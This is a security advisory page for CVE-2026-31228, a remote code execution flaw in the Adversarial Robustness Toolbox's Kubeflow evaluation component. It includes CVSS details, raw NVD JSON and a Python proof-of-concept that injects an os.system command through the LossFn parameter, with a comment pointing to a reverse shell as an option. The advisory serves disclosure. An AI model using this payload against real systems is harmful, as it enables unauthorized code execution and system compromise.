Security Vulnerability Report
中文
CVE-2026-31228 CVSS 9.8 CRITICAL

CVE-2026-31228

Published: 2026-05-12 16:16:15
Last Modified: 2026-05-13 15:52:26
Source: [email protected]

Description

The Adversarial Robustness Toolbox (ART) thru 1.20.1 contains a remote code execution vulnerability in its Kubeflow component. The robustness evaluation function for PyTorch models uses the unsafe eval() function to dynamically evaluate user-supplied strings for the LossFn and Optimizer parameters without any sanitization or security restrictions. An attacker can exploit this by providing a specially crafted string that contains arbitrary Python code, which will be executed when eval() is called, leading to complete compromise of the system running the ART evaluation.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Adversarial Robustness Toolbox (ART) <= 1.20.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# POC for CVE-2026-31228 # Vulnerability: Unsafe usage of eval() in ART PyTorch evaluation import requests def exploit(target_url): # Malicious payload to execute arbitrary Python code # Example: creating a file or establishing a reverse shell payload = "__import__('os').system('touch /tmp/poc_success')" # The vulnerable endpoint expects parameters for the robustness evaluation # 'LossFn' is the parameter that is passed to eval() data = { "model_name": "resnet50", "LossFn": payload, "Optimizer": "Adam" } try: response = requests.post(target_url, json=data, timeout=5) if response.status_code == 200: print(f"[+] Payload sent to {target_url}") print("[+] Check if /tmp/poc_success exists on the target server.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Replace with actual target URL url = "http://vulnerable-art-service/api/v1/evaluate" exploit(url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31228", "sourceIdentifier": "[email protected]", "published": "2026-05-12T16:16:14.633", "lastModified": "2026-05-13T15:52:25.637", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Adversarial Robustness Toolbox (ART) thru 1.20.1 contains a remote code execution vulnerability in its Kubeflow component. The robustness evaluation function for PyTorch models uses the unsafe eval() function to dynamically evaluate user-supplied strings for the LossFn and Optimizer parameters without any sanitization or security restrictions. An attacker can exploit this by providing a specially crafted string that contains arbitrary Python code, which will be executed when eval() is called, leading to complete compromise of the system running the ART evaluation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/Trusted-AI/adversarial-robustness-toolbox", "source": "[email protected]"}, {"url": "https://www.notion.so/CVE-2026-31228-35d1e1393188817f9ab0dc4b1651dfe9", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.